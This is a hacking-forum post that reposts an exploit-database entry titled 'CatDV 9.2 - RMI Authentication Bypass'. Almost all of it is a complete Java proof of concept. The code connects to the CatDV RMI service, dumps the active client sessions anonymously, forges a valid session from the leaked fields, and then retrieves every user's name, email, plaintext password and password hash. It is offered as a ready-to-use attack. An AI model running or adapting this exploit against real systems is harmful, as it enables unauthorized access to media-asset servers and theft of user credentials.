跳转到帖子

  • 游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

    赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

    TheHackerWorld官方

CatDV 9.2 - RMI Authentication Bypass

 分享
HACK1949

HACK1949
CHT漏洞数据库

推荐的帖子

HACK1949 Grand Master

HACK1949

发布于
发布于 
# Exploit Title: CatDV 9.2 - RMI Authentication Bypass 
# Date: 3/1/2021
# Exploit Author: Christopher Ellis, Nick Gonella, Workday Inc.
# Vendor Homepage: https://catdv.com/
# Software Link: https://www.squarebox.com/download/CatDVServer9.2.0.exe
# Version: 9.2 and lower
# Tested on: Windows, Mac

import org.h2.engine.User;
import squarebox.catdv.shared.*;

import java.net.MalformedURLException;
import java.rmi.Naming;
import java.rmi.NotBoundException;
import java.rmi.RemoteException;

public class Runnable {
    public Runnable() throws RemoteException, NotBoundException, MalformedURLException { }

    private static int getValidSession(long createdTime, String claimedHost) {
        return (int)createdTime + claimedHost.hashCode();
    }

    private static void printFields(SField[] fields) {
        for (SField field : fields) {
            System.out.println(field.fieldDefID);
            System.out.println(field.value);
            System.out.println(field.fieldDefinition);
        }
    }

    public static void main(String args[]) throws RemoteException, NotBoundException, MalformedURLException {
        String target = "rmi://<HOST>:1099/CatDVServer";

        ServerAPI look_up = (ServerAPI) Naming.lookup(target);

        System.out.println("Trying to get all connections");
        SConnection[] connections = look_up.getConnections();
        for (SConnection element : connections) {
            System.out.println("Found connection:");
            System.out.println("CatDVUser:"+ element.catdvUser);
            System.out.println("ApiVersion:"+ element.apiVersion);
            System.out.println("User:"+ element.user);
            System.out.println("ClaimedHost:"+ element.claimedHost);
            System.out.println("ActualHost:"+ element.actualHost);
            System.out.println("Created:"+ element.created);
            System.out.println("LastUsed:"+ element.lastUsed);
            System.out.println("Client features:"+ element.clientFeatures);
            System.out.println("\n");
        }

        System.out.println("Getting system properties");
        System.out.println("Running from: "+look_up.getProperty("user.dir"));
        System.out.println("Running on: "+look_up.getProperty("os.arch"));
        System.out.println("Java version: "+look_up.getProperty("java.version"));

        //We can create a new client from most of the fields found in the existing connections which we can dump anonymously
        ClientID bob=new  ClientID(
                connections[0].catdvUser,
                connections[0].claimedHost,
                getValidSession(connections[0].created,connections[0].claimedHost),
                connections[0].created,
                "");

        System.out.println("\nCreated a new client with parameters: \n" +
                "" + "user:"+connections[0].catdvUser+"\n"+
                "" + "claimedHost:"+connections[0].claimedHost+"\n"+
                "" + "session:"+getValidSession(connections[0].created,connections[0].claimedHost)+"\n"+
                "" + "created:"+connections[0].created+"\n"+
                "" + "pubkey:"+""+
                "");


        String status = look_up.getStatus(bob);
        System.out.println("Status is: \n "+status);

        System.out.println("Attempting to dump users: \n");
        SUser[] users=look_up.getUsers(bob, -1);
        for (SUser element: users) {

            System.out.println(element.name);
            System.out.println(element.passwordHash);
                System.out.println("id:" + element.ID);
                System.out.println("realname:" + element.realname);
                System.out.println("email:" + element.email);
                System.out.println("password:" + element.password);
                System.out.println("notes:" + element.notes);
                System.out.println("inactive:" + element.inactive);
                System.out.println("RoleiD:" + element.roleID);
                System.out.println("hash:" + element.passwordHash);
                System.out.println("");
        }

    }

}
链接帖子
意见的链接
分享到其他网站
 分享
转到主题列表

黑客攻防讨论组

黑客攻防讨论组

  
    You don't have permission to chat.

    • 最近浏览   0位会员

      • 没有会员查看此页面。

    黑客世界站内导航 (SITE MAP)

    ×
    ×
    • 创建新的...